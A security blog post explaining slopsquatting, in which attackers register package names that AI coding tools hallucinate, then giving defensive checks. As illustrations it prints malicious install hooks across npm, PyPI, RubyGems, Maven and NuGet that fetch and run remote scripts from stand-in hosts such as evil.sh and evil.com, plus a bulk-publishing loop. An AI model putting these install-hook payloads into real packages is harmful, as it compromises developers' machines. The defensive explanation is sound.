Slopsquatting: An Emerging Threat to Developers Using AI-Powered IDEs

Recently, companies are supercharging developer productivity with AI-powered IDEs and agents! Tools like GitHub Copilot and CursorAI are at the forefront of this exciting transformation, offering developers incredible coding assistance and automation features.

But wait, there's a twist! Some bad actors are exploiting AI "hallucinations," where tools like GitHub Copilot and CursorAI suggest fake package names, to launch slopsquatting attacks. This issue has gained new attention recently with the threat being given a catchy name – “slopsquatting,” created by security researcher Seth Larson – and a study by researchers at three universities showing a 20% chance in LLMs to suggest libraries and packages that don't exist.

cursorAI suggesting a package to use for my project which doesn't exist

In this example, I requested CursorAI to create a simple XML-to-JSON parser. It suggested using a package named xml-js-parser, which, at the time of writing this blog, does not exist.

In this blog, we'll dive into the fascinating world of slopsquatting attacks and, most importantly, show you how to keep your projects safe!


TL;DR

Attackers are scraping non-existent package names from AI-powered IDE suggestions, registering those packages across npm, PyPI, RubyGems, Maven Central, and NuGet, and embedding malicious payloads in install hooks. But don't worry! To defend against slopsquatting, you can manually validate package existence and metadata, use SBOMs and lockfile checks, run installs in sandboxes with network capture, scan for hidden scripts, and adjust LLM settings to reduce hallucinations.

Image from research paper : https://arxiv.org/pdf/2406.10279

1. Anatomy of a Slopsquatting Attack

1.1 AI Hallucinations Expand the Attack Surface

AI-powered IDEs ("vibe-coding" tools) like GitHub Copilot, CursorAI, and ChatGPT-4 occasionally suggest packages that don’t exist. Attackers collect these hallucinations and register them, priming the ecosystem for slopsquatting.

1.2 Bulk Registration & Realistic Metadata

Attackers automate package creation via registry APIs:

# Example: Batch-register hallucinated npm names
for name in $(cat hallucinations.txt); do
  npm publish --access public --tag latest $name
done

Each package is populated with README, version tags, and even fake contributors to bypass cursory checks.

1.3 Payloads in Install Hooks

Slopsquatted packages embed hidden code in install scripts:

// package.json
{
  "name": "dangerous-libx",
  "scripts": {
    "postinstall": "node -e \"require('fs').writeFileSync('/tmp/pwned','you_are_hacked')\""
  }
}

On npm install dangerous-libx, the malicious script executes silently.

2. Validate AI-Suggested Packages

Before adding any AI-recommended dependency, follow these steps:

  1. Verify Existence

     npm view <package-name> || echo "Package not found"
    
  2. Inspect Manifests

    • Check package.json, setup.py, or .gemspec for valid license, author, and version history.
  3. Check Popularity

     npm info <pkg> | grep "downloads"
     pip index versions <pkg>
    
  4. Review Source Code

     git clone https://registry.example.com/<pkg>.git
     grep -R "postinstall\|system(" *
    

3. Cross-Ecosystem Impact & Code Examples

3.1 npm & Node.js

Risk: Unrestricted install hooks.
Payload Example:

{
  "name": "lodash-lite-utils",
  "version": "1.0.3",
  "scripts": {
    "postinstall": "curl -s https://evil.sh/install.sh | bash"
  }
}

Detection Snippet:

npm audit --json | jq '.advisories'

3.2 PyPI & Python

Risk: Code execution in setup.py.

# setup.py of slopsquatted xmltodate
from setuptools import setup
import os; os.system("curl http://evil.com/pwn.py | python3")
setup(name='xmltodate', version='0.0.1')

Audit Command:

pip install safety && safety check

3.3 RubyGems

Risk: extensions hook.

# rails-helperzz.gemspec
Gem::Specification.new do |s|
  s.name       = 'rails-helperzz'
  s.extensions = ['ext/install.rb']
end
# ext/install.rb
system('bash -c "curl http://evil.sh/attack.sh | bash"')

3.4 Maven Central & Java

Risk: Static initializer abuse.

// In a malicious Jar
static { Runtime.getRuntime().exec("sh -c 'curl http://malicious-link.com/p.sh | sh'"); }

3.5 NuGet & .NET

Risk: Remote DLL loading.

// In a .NET slopsquatted package
Assembly.LoadFrom("http://evil.com/mal.dll");

4. Advanced Detection & Mitigation

4.1 Generate & Enforce SBOM

syft . -o cyclonedx-json > sbom.json #syft is a tool to generate SBOM
cyclonedx-pipeline validate sbom.json

Use policy engines (Open Policy Agent) to allow-list known good packages.

4.2 Lockfile Integrity

diff < (jq -r '.dependencies | keys[]' package.json) <(jq -r '.lockedDependencies | keys[]' package-lock.json)

Reject builds if unexpected dependencies appear.

4.3 Sandbox Installs & Network Monitoring

docker run --rm -it node:16 bash -c "npm install your-app && tcpdump -i eth0"

Alert on any outbound connections to unknown domains.

4.4 LLM Governance

  • Temperature Tuning: Lower temp in LLMs.

  • Post-Validation Script:

      for pkg in $(jq -r '.aiSuggestions[]'); do
        curl -s https://registry.npmjs.org/$pkg > /dev/null || echo "$pkg hallucinated"
      done
    

5. Conclusion

By adopting these measures, you can significantly strengthen your defenses against slopsquatting attacks and safeguard your software development processes from potential vulnerabilities. You can defend your codebase by validating every AI-suggested dependency, leveraging SBOMs, enforcing lockfile checks, sandboxing installs, and tuning your LLM.

10
Subscribe to my newsletter

Read articles from Hare Krishna Rai directly inside your inbox. Subscribe to the newsletter, and don't miss out.

Written by

Hare Krishna Rai
Hare Krishna Rai

Specialized in uncovering vulnerabilities within software supply chains and dependency ecosystems. Creator of SCAGoat and other open-source security tools. Speaker at Black Hat, DEF CON, and AppSec conferences with research on malicious package detection, dependency confusion, and CI/CD security.